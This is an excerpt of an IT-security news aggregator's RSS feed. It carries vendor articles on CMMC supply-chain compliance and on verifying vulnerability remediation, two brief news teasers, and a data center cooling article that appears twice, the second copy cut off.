<description><![CDATA[The updated Cybersecurity Maturity Model Certification (CMMC) represents a critical evolution in the Department of War (DoW) strategy to secure the Defense Industrial Base (DIB). It is more than a regulatory hurdle. It is a direct response to a rapidly changing and increasingly hostile threat lan...]]></description>
<link>https://tsecurity.de/de/3708190/it-security-nachrichten/youre-only-as-secure-as-your-last-evaluation/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708190/it-security-nachrichten/youre-only-as-secure-as-your-last-evaluation/</guid>
<pubDate>Thu, 06 Aug 2026 15:08:15 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">The updated Cybersecurity Maturity Model Certification (CMMC) represents a critical evolution in the Department of War (DoW) strategy to secure the Defense Industrial Base (DIB). It is more than a regulatory hurdle. It is a direct response to a rapidly changing and increasingly hostile threat landscape faced by the DIB.</p>



<p class="wp-block-paragraph">Updated CMMC guidance issued in 2025 simplifies the prior framework, focusing on the most essential security practices aligned with National Institute of Standards and Technology (NIST) Special Publication (SP) 800-171. Its fundamental purpose remains unchanged: to protect sensitive, unclassified defense information — specifically Federal Contract Information (FCI) and Controlled Unclassified Information (CUI) — from foreign adversaries.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure class="wp-block-image size-full"><img loading="lazy" src="https://b2b-contenthub.com/wp-content/uploads/2026/08/CMMC.png" alt="CMMC phases" class="wp-image-4206154" width="624" height="352" sizes="auto, (max-width: 624px) 100vw, 624px"></figure><p class="imageCredit">Horizon3</p></div><p class="wp-block-paragraph"><em>The updated CMMC phases. Image from </em><a href="https://dodcio.defense.gov/cmmc/About/" target="_blank" rel="noreferrer noopener"><em>https://dodcio.defense.gov/cmmc/About/</em></a><em> </em></p>



<h3 class="wp-block-heading">CMMC implementation phases</h3>



<p class="wp-block-paragraph">The CMMC requirements are being implemented in phases to ease the burden on both organizations and auditors.</p>



<ul class="wp-block-list">
<li><strong>Phase 1 (Nov 10, 2025 – Nov 9, 2026):</strong> Focus on self-assessments for Levels 1 and 2</li>



<li><strong>Beginning Nov 10, 2026:</strong> Solicitations will require Level 2 certifications</li>
</ul>



<p class="wp-block-paragraph">For thousands of companies across the DIB— from prime contractors to small, specialized machine shops — compliance is not optional. It is the prerequisite for doing business with the DoW. It establishes a standardized, measured approach to cybersecurity across the supply chain.</p>



<h3 class="wp-block-heading">A shift in adversary strategy</h3>



<p class="wp-block-paragraph">The strategic focus of adversaries has shifted. Rather than launching costly, direct attacks against well-defended prime contractors, they increasingly target the weakest link in the supply chain.</p>



<p class="wp-block-paragraph">Suppliers and subcontractors often:</p>



<ul class="wp-block-list">
<li>Possess valuable intellectual property, schematics, and operational details</li>



<li>Operate without the same security resources as larger defense firms</li>
</ul>



<p class="wp-block-paragraph">These operational activities create a pathway into the broader ecosystem. A breach at any tier can reverberate across the supply chain, exposing sensitive information and impacting mission outcomes.</p>



<h3 class="wp-block-heading">The limitations of point-in-time security</h3>



<p class="wp-block-paragraph">The traditional model of cybersecurity compliance has relied on periodic, point-in-time assessments. This approach is fundamentally limited in the context of a dynamic and interconnected supply chain.</p>



<p class="wp-block-paragraph">Security is not static. A posture that was compliant weeks ago can become vulnerable due to:</p>



<ul class="wp-block-list">
<li>New exploits or zero-day vulnerabilities</li>



<li>System configuration changes</li>



<li>Introduction of new technologies or shadow IT</li>
</ul>



<p class="wp-block-paragraph"><strong>The core issue is straightforward: You are only as secure as your last evaluation. </strong>In an environment that is constantly evolving, this model leaves a persistent gap between compliance and actual risk.</p>



<h3 class="wp-block-heading">Enabling continuous validation</h3>



<p class="wp-block-paragraph">Horizon3.ai’s <a href="https://horizon3.ai/vertical/federal/" target="_blank" rel="noreferrer noopener">NodeZero Federal</a>™ enables a more continuous approach to security validation. Unlike traditional penetration testing or vulnerability scanning, NodeZero identifies and validates exploitable weaknesses and demonstrates how they can be chained together.</p>



<p class="wp-block-paragraph">This provides organizations with the ability to:</p>



<ul class="wp-block-list">
<li><strong>Validate controls regularly: </strong>Demonstrate effectiveness on an ongoing basis, not just during audits</li>



<li><strong>Close the compliance gap: </strong>Move beyond documentation to show how controls mitigate real-world risk</li>



<li><strong>Identify attack paths: </strong>Understand how an adversary could move through the environment</li>
</ul>



<p class="wp-block-paragraph">This approach supports a more realistic understanding of security posture and risk.</p>



<h3 class="wp-block-heading">Expanding the scope: From enterprise to ecosystem</h3>



<p class="wp-block-paragraph">Elevating supply chain security for FCI and CUI represents a broader shift in how the DoW approaches risk. The focus is no longer limited to securing individual networks. It extends across the entire DIB ecosystem.</p>



<p class="wp-block-paragraph">The objective is not only compliance, but:</p>



<ul class="wp-block-list">
<li>Measurable risk reduction</li>



<li>Greater resilience across interconnected environments</li>



<li>Assurance of mission continuity</li>
</ul>



<h3 class="wp-block-heading">Implications for prime contractors</h3>



<p class="wp-block-paragraph">CMMC reinforces a long-standing reality: The security posture of a prime contractor is directly influenced by the posture of its suppliers.</p>



<p class="wp-block-paragraph">This introduces cascading risks across the supply chain, particularly where subcontractors process, store, or transmit CUI.</p>



<p class="wp-block-paragraph">Key implications include:</p>



<ul class="wp-block-list">
<li><strong>Jeopardized prime contractor posture: </strong>A security incident at a supplier can impact the prime’s certification.</li>



<li><strong>Contract ineligibility and business impact: </strong>Non-compliance may lead to disqualification from DoW contracts.</li>



<li><strong>Mission assurance risk: </strong>Compromised CUI can affect operational integrity and outcomes</li>
</ul>



<h3 class="wp-block-heading">Common sources of compromise</h3>



<p class="wp-block-paragraph">Compromise often originates in predictable areas of the supply chain.</p>



<p class="wp-block-paragraph"><strong>Third-party providers. </strong>Managed service providers (MSPs) and vendors supporting multiple organizations can introduce systemic risk. A single compromise can expose multiple environments.</p>



<p class="wp-block-paragraph"><strong>Specialized suppliers. </strong>Small and medium-sized organizations may handle sensitive data but lack enterprise-grade security controls.</p>



<p class="wp-block-paragraph"><strong>Interconnected access points. </strong>Common weaknesses include:</p>



<ul class="wp-block-list">
<li>Shared credentials</li>



<li>Weak or misconfigured VPN access</li>



<li>Federated identity systems without proper segmentation</li>
</ul>



<h3 class="wp-block-heading">Example: Assume-breach scenario</h3>



<p class="wp-block-paragraph">In a recent assume-breach test, NodeZero began with access to a single host without credentials. From that starting point, it enumerated domain users and executed a password spray, successfully obtaining a valid domain credential.</p>



<p class="wp-block-paragraph">That account had local administrator privileges, enabling further actions:</p>



<ul class="wp-block-list">
<li>Deployment of a remote access tool (RAT)</li>



<li>LSASS access and credential harvesting</li>
</ul>



<p class="wp-block-paragraph">This scenario highlights a common issue: controls that are assumed to be in place may not perform as expected in practice.</p>



<h3 class="wp-block-heading">Why the legacy model does not scale</h3>



<p class="wp-block-paragraph">The legacy model of periodic assessments does not account for the dynamic nature of modern environments.</p>



<p class="wp-block-paragraph">Risk is introduced through:</p>



<ul class="wp-block-list">
<li>Supply chain changes and new vendors</li>



<li>Ongoing system reconfigurations</li>



<li>Expansion of SaaS, APIs, and cloud services</li>



<li>Gradual degradation of controls over time</li>
</ul>



<p class="wp-block-paragraph">As a result, a point-in-time certification can quickly become outdated.</p>



<h3 class="wp-block-heading">Continuous readiness under CMMC</h3>



<p class="wp-block-paragraph">The updated CMMC guidance emphasizes continuous readiness rather than periodic validation. Self-assessments are expected to be supported by documented, day-to-day evidence of control effectiveness.</p>



<p class="wp-block-paragraph">This reflects the need to maintain security posture over time, not just demonstrate it at a single point.</p>



<h3 class="wp-block-heading">Continuous validation as a practical requirement</h3>



<p class="wp-block-paragraph">Moving to continuous validation helps organizations keep pace with:</p>



<ul class="wp-block-list">
<li>Changing threat activity</li>



<li>Evolving supplier ecosystems</li>



<li>The need to maintain confidence in control effectiveness</li>
</ul>



<p class="wp-block-paragraph">Without this, organizations rely on outdated assumptions about their environment and exposure.</p>



<h3 class="wp-block-heading">Closing the gap between compliance and security</h3>



<p class="wp-block-paragraph">HORIZON3.ai’s NodeZero® Proactive Security Platform helps bridge the gap between compliance and operational security. By validating controls through real-world attack scenarios, it provides evidence of effectiveness and identifies gaps across both internal environments and critical suppliers.</p>



<p class="wp-block-paragraph">This enables organizations to treat CMMC not just as a compliance requirement, but as part of an ongoing risk management program.</p>



<h3 class="wp-block-heading">Final thought</h3>



<p class="wp-block-paragraph">True security posture is not defined by a completed assessment.</p>



<p class="wp-block-paragraph">It is defined by how systems perform under real conditions, and how quickly organizations can identify and address weaknesses as they emerge. </p>



<p class="wp-block-paragraph">Learn more about how Horizon3.ai strengthens supply chain security for CMMC.<br><a href="https://horizon3.ai/wp-content/uploads/2026/05/2605_Whitepaper_Supply-Chain-Security-CMMC_US_Digital.pdf" target="_blank" rel="noreferrer noopener">Please refer to the full white paper</a>.</p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Apple iCloud Private Relay Can Expose Real IPs Through WebKit Proxy Bypasses]]></title>
<description><![CDATA[Cybersecurity researchers have disclosed a security issue with Apple's iCloud Private Relay tool that can expose a user's real IP address.

Introduced with iOS 15, iCloud Private Relay employs a dual-hop architecture to ensure users' privacy by routing their Safari web traffic through two relays ...]]></description>
<link>https://tsecurity.de/de/3708167/it-security-nachrichten/apple-icloud-private-relay-can-expose-real-ips-through-webkit-proxy-bypasses/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708167/it-security-nachrichten/apple-icloud-private-relay-can-expose-real-ips-through-webkit-proxy-bypasses/</guid>
<pubDate>Thu, 06 Aug 2026 14:54:16 +0200</pubDate>
<content:encoded><![CDATA[Cybersecurity researchers have disclosed a security issue with Apple's iCloud Private Relay tool that can expose a user's real IP address.

Introduced with iOS 15, iCloud Private Relay employs a dual-hop architecture to ensure users' privacy by routing their Safari web traffic through two relays so that no single third-party, including Apple, can determine where the request is originating from]]></content:encoded>
</item>
<item>
<title><![CDATA[7 Best Web Crawling Tools and APIs in 2026]]></title>
<description><![CDATA[Learn about the best web crawling tools for collecting website content, crawling subpages, generating clean web data, and powering AI agents.]]></description>
<link>https://tsecurity.de/de/3708102/ai-nachrichten/7-best-web-crawling-tools-and-apis-in-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708102/ai-nachrichten/7-best-web-crawling-tools-and-apis-in-2026/</guid>
<pubDate>Thu, 06 Aug 2026 14:41:27 +0200</pubDate>
<content:encoded><![CDATA[Learn about the best web crawling tools for collecting website content, crawling subpages, generating clean web data, and powering AI agents.]]></content:encoded>
</item>
<item>
<title><![CDATA[Verification closes the loop]]></title>
<description><![CDATA[Most organizations assume remediation reduces risk.



It’s a reasonable assumption. A vulnerability is identified, a patch is applied, the scanner comes back clean, and the ticket is closed. The workflow is complete, the metrics improve, and the issue is considered resolved.



The problem is th...]]></description>
<link>https://tsecurity.de/de/3708067/it-security-nachrichten/verification-closes-the-loop/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708067/it-security-nachrichten/verification-closes-the-loop/</guid>
<pubDate>Thu, 06 Aug 2026 14:12:09 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">Most organizations assume remediation reduces risk.</p>



<p class="wp-block-paragraph">It’s a reasonable assumption. A vulnerability is identified, a patch is applied, the scanner comes back clean, and the ticket is closed. The workflow is complete, the metrics improve, and the issue is considered resolved.</p>



<p class="wp-block-paragraph">The problem is that attackers don’t care about remediation workflows. They care about outcomes.</p>



<p class="wp-block-paragraph">A scanner may no longer report the vulnerability, but those activities do not matter if an attacker can still achieve the same objective through the same attack path, excessive privileges, or a different weakness that was never addressed in the first place.</p>



<p class="wp-block-paragraph">Many security programs measure whether work was completed, but they don’t always measure whether risk was actually reduced.</p>



<h2 class="wp-block-heading">The assumption that gets teams in trouble</h2>



<p class="wp-block-paragraph">The cybersecurity industry has become very good at measuring mean time to remediate, patch compliance, SLA attainment, and ticket closure rates. Those metrics have value, but none of them answer the question an attacker is asking.</p>



<p class="wp-block-paragraph"><strong>Can I still get in?</strong></p>



<p class="wp-block-paragraph">In practice, that’s where the assumption breaks down. Remediation activity and risk reduction are often treated as the same thing, even though they measure very different outcomes. One measures whether work was performed. The other measures whether the conditions that made an attack possible still exist.</p>



<p class="wp-block-paragraph">Our recent <a href="https://horizon3.ai/downloads/research/the-state-of-assumed-security/">survey</a> of 750 security leaders and practitioners revealed a consistent pattern. Only 30% of CISOs reported that their organizations patch and then test to ensure risk has actually been remediated. Nearly half patch and rescan with a vulnerability scanner instead.</p>



<p class="wp-block-paragraph">Security teams are working hard, remediating vulnerabilities, deploying controls, and closing tickets every day. <strong>The issue is verification.</strong> A patch may remove a vulnerability and a rescan may confirm the patch was applied, but neither proves an attacker can no longer succeed.</p>



<p class="wp-block-paragraph">Security teams don’t get credit for completing work, they get credit for reducing risk. And the only way to know whether risk was actually reduced is to verify it.</p>



<h2 class="wp-block-heading">Verification changes the conversation</h2>



<p class="wp-block-paragraph">Most security teams don’t struggle to find vulnerabilities. They struggle to verify that their remediation efforts actually worked.</p>



<p class="wp-block-paragraph">That was the challenge facing a <a href="https://horizon3.ai/intelligence/blogs/patch-tuesday-to-pentest-wednesday-reducing-security-surprises/" target="_blank" rel="noreferrer noopener">global investment firm</a> operating across 18 locations. They already had vulnerability data, security assessments, and remediation workflows. What they lacked was certainty. They wanted to understand which weaknesses represented real risk, whether their fixes were reducing exposure, and how to avoid being surprised by an issue that should have been discovered earlier.</p>



<p class="wp-block-paragraph">An early internal penetration test (pentest) revealed 85 weaknesses. By itself, that number wasn’t particularly alarming. The real risk emerged when those flaws enabled 251 impacts, including domain compromise, compromised credentials, host compromise, ransomware exposure, and sensitive data exposure. The weaknesses themselves were only part of the story. The real risk emerged when those weaknesses were chained together the way an attacker would chain them together.</p>



<p class="wp-block-paragraph">While many organizations would stop there, this team retested. That decision changed the conversation from remediation activity to measurable risk reduction. A follow-up, same-scope pentest showed that impacts had dropped from 251 to zero. Compromised credentials fell from 52 to zero. Compromised hosts fell from 67 to zero. Cracked Active Directory passwords dropped from 40 to zero.</p>



<h2 class="wp-block-heading">That’s what verification looks like.</h2>



<p class="wp-block-paragraph">Not a closed ticket, but concrete evidence that the outcomes an attacker cared about are no longer achievable.</p>



<p class="wp-block-paragraph">Why verification remains elusive</p>



<p class="wp-block-paragraph">In our survey, 22% of practitioners identified verification of fixes as their biggest cybersecurity challenge going into 2026, while another 21% pointed to demonstrating measurable risk reduction. Both ranked ahead of budget constraints and talent shortages.</p>



<p class="wp-block-paragraph">That gap persists because confirmation is harder than remediation. Applying a patch is a discrete action. Proving that an attacker can no longer achieve the same objective is harder. It requires testing and verifying that the attack path is gone, not simply assuming it disappeared because a vulnerability no longer appears in a scan report.</p>



<p class="wp-block-paragraph">That’s where many organizations fall back on proxies. A vulnerability scanner reports that: the affected version is gone; a ticket is closed; a dashboard shows improving metrics. Those signals are useful, but they are still indicators of activity. They are not proof that exposure was reduced.</p>



<p class="wp-block-paragraph">That gap matters because attackers measure success by achieving objectives, not by confirming that a version number changed. Defenders need the same standard.</p>



<p class="wp-block-paragraph">That’s the difference between remediation and verification.</p>



<h2 class="wp-block-heading">What mature security programs do differently</h2>



<p class="wp-block-paragraph">The organizations that make the greatest progress aren’t necessarily the ones that find the most vulnerabilities. They’re the ones that become disciplined about proving whether their actions reduced risk.</p>



<p class="wp-block-paragraph">That shift changes the conversation. Instead of asking: “Did we patch it?” they ask: “Can an attacker still achieve the same objective?”</p>



<p class="wp-block-paragraph">Instead of measuring success by ticket closure, they measure success by whether the outcomes attackers care about are still possible.</p>



<p class="wp-block-paragraph">You can see that mindset across many of our Pentest Wednesday™ stories. <a href="https://horizon3.ai/intelligence/blogs/from-patch-tuesday-to-pentest-wednesday-continuous-validation-in-a-regulated-environment/" target="_blank" rel="noreferrer noopener">Financial services organizations</a> built continuous verification into their operations because leadership needed confidence that remediation remained effective over time. <a href="https://horizon3.ai/intelligence/blogs/from-patch-tuesday-to-pentest-wednesday-proof-that-redefined-security-for-a-manufacturer/" target="_blank" rel="noreferrer noopener">Manufacturers</a> and <a href="https://horizon3.ai/intelligence/blogs/internal-pentest-hidden-attack-paths/" target="_blank" rel="noreferrer noopener">defense industrial base organizations</a> used repeat testing to ensure attack paths stayed closed as environments evolved.</p>



<p class="wp-block-paragraph">The common thread isn’t the industry or the technology, it’s the discipline to keep going after the fix:</p>



<ul class="wp-block-list">
<li><strong>Validate the exposure.</strong></li>



<li><strong>Fix the exposure.</strong></li>



<li><strong>Verify the exposure is gone.</strong></li>



<li><strong>Repeat.</strong></li>
</ul>



<p class="wp-block-paragraph">Mature organizations build <em>continuous verification</em> into their operations because leadership needs to trust that remediation remains effective as the network evolves.</p>



<p class="wp-block-paragraph">The future belongs to verification</p>



<p class="wp-block-paragraph">The cybersecurity industry is entering another period of rapid change. AI is accelerating prioritization, remediation, reporting, and analysis. Security teams will find vulnerabilities faster, process findings faster, and automate more workflows than ever before.</p>



<p class="wp-block-paragraph">Validating exposure and fixing it are essential, but neither closes the loop. Verification closes the loop. Confidence alone will not stop an attacker, but repeatable verification will.</p>



<p class="wp-block-paragraph">Get a <a href="https://horizon3.ai/contact-us/schedule-demo/" target="_blank" rel="noreferrer noopener">demo</a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why AI is forcing a rethink of data center cooling]]></title>
<description><![CDATA[For years, cooling has played a supporting role in data center design. Decisions have been driven primarily by compute, storage and networking requirements, while cooling systems quietly ensured everything stayed within safe operating limits. Most enterprise environments operated well within the ...]]></description>
<link>https://tsecurity.de/de/3708054/it-security-nachrichten/why-ai-is-forcing-a-rethink-of-data-center-cooling/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708054/it-security-nachrichten/why-ai-is-forcing-a-rethink-of-data-center-cooling/</guid>
<pubDate>Thu, 06 Aug 2026 14:05:20 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">For years, cooling has played a supporting role in data center design. Decisions have been driven primarily by compute, storage and networking requirements, while cooling systems quietly ensured everything stayed within safe operating limits. Most enterprise environments operated well within the capabilities of traditional air-cooling that was designed to sustain normal growth. This let organizations focus their attention on capacity, performance and cost of the compute.</p>



<p class="wp-block-paragraph"><a href="https://www.cio.com/article/4145783/ai-is-redefining-what-enterprises-expect-from-data-centers.html">That balance is now being disrupted</a>.</p>



<p class="wp-block-paragraph">Artificial intelligence is reshaping the thermal profile of modern data centers. As organizations roll out more powerful CPUs, GPUs and TPU’s to support AI workloads, <a href="https://journal.uptimeinstitute.com/ai-embraces-liquid-cooling-but-enterprise-it-is-slow-to-follow/">heat generation is rising at a pace</a> that many facilities were never built to handle. With AI in the picture, cooling is no longer simply an operational consideration. It is becoming a primary constraint and strategic differentiator on AI infrastructure growth.</p>



<h2 class="wp-block-heading">The limits of air cooling are becoming clear</h2>



<p class="wp-block-paragraph">Although traditional air cooling continues to support many enterprise workloads effectively, its limitations are becoming increasingly evident as organizations deploy larger AI clusters with increasingly power-hungry CPUs and GPUs, generating heat at levels older data centers were never designed to accommodate.</p>



<p class="wp-block-paragraph">Racks that once operated at 5–10kW are being replaced by AI systems drawing <a href="https://blog.se.com/datacenter/2025/07/23/ai-data-center-design-and-deployment-are-moving-at-an-incredible-pace-3-ways-to-approach-a-changing-landscape/">60kW or more</a>, with some high-end deployments exceeding 100kW per rack. At the component level, individual GPUs are drawing 700W–1,200W each, placing large amounts of heat into a very small space. This shift represents a step-change in thermal density that conventional air-cooling systems, typically effective only up to around 20–30kW per rack, struggle to handle efficiently.</p>



<p class="wp-block-paragraph">At these levels, the challenge becomes structural. Air can only do so much. There’s a hard limit to how efficiently it can move heat, and simply increasing airflow or optimising ventilation isn’t enough to keep pace with the rate at which heat is being generated.</p>



<p class="wp-block-paragraph">The consequence is a growing imbalance between compute capability and cooling capacity. Data centers are being forced to use more energy for cooling, while simultaneously managing higher thermal risk and operational complexity. In some cases, this also introduces performance constraints, as systems throttle workloads to remain within safe operating temperatures.</p>



<p class="wp-block-paragraph">Because of this, more organizations are turning to liquid cooling — particularly direct-to-chip approaches.</p>



<h2 class="wp-block-heading">How direct-to-chip cooling is addressing rising heat challenges</h2>



<p class="wp-block-paragraph">The main limitation of air cooling is its relative inefficiency at removing concentrated heat. Direct-to-chip cooling addresses this. Instead of relying on chilled air moving around the room, direct-to-chip systems put cooling exactly where it’s needed, by placing cold plates directly onto high-heat components such as CPUs and GPUs. Coolant flows through these plates, absorbing heat at the source before carrying it away for dissipation via a heat exchange system.</p>



<p class="wp-block-paragraph">A direct-to-chip cooling system is made of several parts working together. Cold plates absorb heat straight from the chips, while a coolant distribution unit (CDU) manages the temperature, pressure and flow of the liquid. The coolant moves through pipes connected to each rack, carrying heat away from the servers and into the facility’s wider cooling system while sensors monitor temperatures, flow rates and leak detection.</p>



<p class="wp-block-paragraph">Liquids transfer heat far more efficiently than air, so direct-to-chip cooling allows significantly greater thermal loads to be managed with lower energy overheads. Because heat is removed more directly and effectively at the source, data centers require less power for fans, airflow and chiller operation, reducing overall energy consumption.</p>



<p class="wp-block-paragraph">In most cases, only the components that generate the most heat are liquid-cooled. The rest of the system continues to rely on familiar air-cooling approaches. That mix is a big part of the appeal. A hybrid cooling approach allows organizations to improve cooling performance where it matters most, without having to redesign their entire environment.</p>



<h2 class="wp-block-heading">Direct-to-chip isn’t one-size-fits-all</h2>



<p class="wp-block-paragraph">While direct-to-chip is talked about as a single approach, there are actually a few different ways to implement it. Most organizations use single-phase liquid cooling, where the coolant stays in liquid form throughout the process. It’s simple, easy to manage and fits well with existing operational models, which makes it a natural starting point.</p>



<p class="wp-block-paragraph">But there is also a growing shift towards warm-water cooling. Because water is so effective at absorbing heat, systems don’t need to run at the same low temperatures as traditional air-cooled environments. This can reduce the need for energy-intensive chilling and improve overall efficiency.</p>



<p class="wp-block-paragraph">In some setups, direct-to-chip cooling is paired with rear-door heat exchangers. These capture any remaining heat as air leaves the rack, helping to push densities even higher without overloading the system.</p>



<p class="wp-block-paragraph">Ultimately, there isn’t a single “correct” way to approach cooling. The best method depends on the workloads being supported, the constraints of the facility and the organization’s longer-term plans. What’s clear, however, is that flexibility is becoming increasingly important as cooling requirements continue to evolve.</p>



<h2 class="wp-block-heading">Direct-to-chip vs immersion cooling</h2>



<p class="wp-block-paragraph">As liquid cooling gains traction, direct-to-chip is often compared with immersion cooling. While both approaches address the same fundamental problem — removing significantly higher levels of heat – they do so in very different ways, with different implications for how data centers are designed and operated.</p>



<p class="wp-block-paragraph">Immersion cooling takes a more radical route by fully submerging servers in dielectric fluid — a liquid that does not conduct electricity or conducts it extremely poorly. From a cooling perspective, it is highly effective and can handle extremely dense, high compute environments. But it comes with trade-offs.</p>



<p class="wp-block-paragraph">Immersion cooling requires a rethink of how data centers operate. It also demands significant infrastructure shifts, which can make adoption challenging for organizations with established data center models.</p>



<p class="wp-block-paragraph">Direct-to-chip cooling, on the other hand, offers a more gradual step forward. In general, servers keep their familiar design, and day-to-day maintenance doesn’t change dramatically. Teams can continue working in ways they already understand, making it a more practical step for many organizations.</p>



<p class="wp-block-paragraph">This practicality makes all the difference. For most organizations, the decision isn’t just about which solution performs best in theory, it’s about what can be deployed, managed and scaled within the realities of existing operations. In that sense, direct-to-chip strikes a balance between performance gains and operational continuity, making it a more accessible starting point for many data centers navigating the shift to higher-density workloads.</p>



<h2 class="wp-block-heading">Cooling as a competitive advantage</h2>



<p class="wp-block-paragraph">Cooling is no longer simply an operational concern. It is becoming a defining factor in how data centers scale, how efficiently they run and how reliably they perform. As AI workloads push infrastructure to new limits, the ability to manage heat effectively will directly influence how far and how fast organizations can grow.</p>



<p class="wp-block-paragraph">That shift is also changing who owns the conversation. Decisions that once sat with facilities teams are now firmly on the agenda for <a href="https://www.cio.com/article/4193828/preparing-for-infrastructure-constraints-from-memory-shortages-to-power-limits.html">CIOs, CTOs and infrastructure leaders</a>. Thermal design, energy efficiency and cooling architecture are no longer niche considerations, they are central to cost control, sustainability targets and overall competitiveness.</p>



<p class="wp-block-paragraph">At the same time, there is no one correct solution. Air cooling will continue to support many workloads, while immersion cooling will remain relevant for specialised, high-density use cases. Direct-to-chip cooling sits between the two, offering a practical way to handle increasing thermal demands without disrupting established operating models.</p>



<p class="wp-block-paragraph">For organizations planning the next phase of their infrastructure, cooling can no longer be treated as an afterthought. It needs to be considered alongside compute, storage and networking from the outset.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Why AI is forcing a rethink of data center cooling]]></title>
<description><![CDATA[For years, cooling has played a supporting role in data center design. Decisions have been driven primarily by compute, storage and networking requirements, while cooling systems quietly ensured everything stayed within safe operating limits. Most enterprise environments operated well within the ...]]></description>
<link>https://tsecurity.de/de/3708047/it-nachrichten/why-ai-is-forcing-a-rethink-of-data-center-cooling/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3708047/it-nachrichten/why-ai-is-forcing-a-rethink-of-data-center-cooling/</guid>
<pubDate>Thu, 06 Aug 2026 14:04:16 +0200</pubDate>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">For years, cooling has played a supporting role in data center design. Decisions have been driven primarily by compute, storage and networking requirements, while cooling systems quietly ensured everything stayed within safe operating limits. Most enterprise environments operated well within the capabilities of traditional air-cooling that was designed to sustain normal growth. This let organizations focus their attention on capacity, performance and cost of the compute.</p>



<p class="wp-block-paragraph"><a href="https://www.cio.com/article/4145783/ai-is-redefining-what-enterprises-expect-from-data-centers.html">That balance is now being disrupted</a>.</p>



<p class="wp-block-paragraph">Artificial intelligence is reshaping the thermal profile of modern data centers. As organizations roll out more powerful CPUs, GPUs and TPU’s to support AI workloads, <a href="https://journal.uptimeinstitute.com/ai-embraces-liquid-cooling-but-enterprise-it-is-slow-to-follow/">heat generation is rising at a pace</a> that many facilities were never built to handle. With AI in the picture, cooling is no longer simply an operational consideration. It is becoming a primary constraint and strategic differentiator on AI infrastructure growth.</p>



<h2 class="wp-block-heading">The limits of air cooling are becoming clear</h2>



<p class="wp-block-paragraph">Although traditional air cooling continues to support many enterprise workloads effectively, its limitations are becoming increasingly evident as organizations deploy larger AI clusters with increasingly power-hungry CPUs and GPUs, generating heat at levels older data centers were never designed to accommodate.</p>



<p class="wp-block-paragraph">Racks that once operated at 5–10kW are being replaced by AI systems drawing <a href="https://blog.se.com/datacenter/2025/07/23/ai-data-center-design-and-deployment-are-moving-at-an-incredible-pace-3-ways-to-approach-a-changing-landscape/">60kW or more</a>, with some high-end deployments exceeding 100kW per rack. At the component level, individual GPUs are drawing 700W–1,200W each, placing large amounts of heat into a very small space. This shift represents a step-change in thermal density that conventional air-cooling systems, typically effective only up to around 20–30kW per rack, struggle to handle efficiently.</p>



<p class="wp-block-paragraph">At these levels, the challenge becomes structural. Air can only do so much. There’s a hard limit to how efficiently it can move heat, and simply increasing airflow or optimising ventilation isn’t enough to keep pace with the rate at which heat is being generated.</p>



<p class="wp-block-paragraph">The consequence is a growing imbalance between compute capability and cooling capacity. Data centers are being forced to use more energy for cooling, while simultaneously managing higher thermal risk and operational complexity. In some cases, this also introduces performance constraints, as systems throttle workloads to remain within safe operating temperatures.</p>



<p class="wp-block-paragraph">Because of this, more organizations are turning to liquid cooling — particularly direct-to-chip approaches.</p>



<h2 class="wp-block-heading">How direct-to-chip cooling is addressing rising heat challenges</h2>



<p class="wp-block-paragraph">The main limitation of air cooling is its relative inefficiency at removing concentrated heat. Direct-to-chip cooling addresses this. Instead of relying on chilled air moving around the room, direct-to-chip systems put cooling exactly where it’s needed, by placing cold plates directly onto high-heat components such as CPUs and GPUs. Coolant flows through these plates, absorbing heat at the source before carrying it away for dissipation via a heat exchange system.</p>



<p class="wp-block-paragraph">A direct-to-chip cooling system is made of several parts working together. Cold plates absorb heat straight from the chips, while a coolant distribution unit (CDU) manages the temperature, pressure and flow of the liquid. The coolant moves through pipes connected to each rack, carrying heat away from the servers and into the facility’s wider cooling system while sensors monitor temperatures, flow rates and leak detection.</p>



<p class="wp-block-paragraph">Liquids transfer heat far more efficiently than air, so direct-to-chip cooling allows significantly greater thermal loads to be managed with lower energy overheads. Because heat is removed more directly and effectively at the source, data centers require less power for fans, airflow and chiller operation, reducing overall energy consumption.</p>



<p class="wp-block-paragraph">In most cases, only the components that generate the most heat are liquid-cooled. The rest of the system continues to rely on familiar air-cooling approaches. That mix is a big part of the appeal. A hybrid cooling approach allows organizations to improve cooling performance where it matters most, without having to redesign their entire environment.</p>



<h2 class="wp-block-heading">Direct-to-chip isn’t one-size-fits-all</h2>



<p class="wp-block-paragraph">While direct-to-chip is talked about as a single approach, there are actually a few different ways to implement it. Most organizations use single-phase liquid cooling, where the coolant stays in liquid form throughout the process. It’s simple, easy to manage and fits well with existing operational models, which makes it a natural starting point.</p>



<p class="wp-block-paragraph">But there is also a growing shift towards warm-water cooling. Because water is so effective at absorbing heat, systems don’t need to run at the same low temperatures as traditional air-cooled environments. This can reduce the need for energy-intensive chilling and improve overall efficiency.</p>



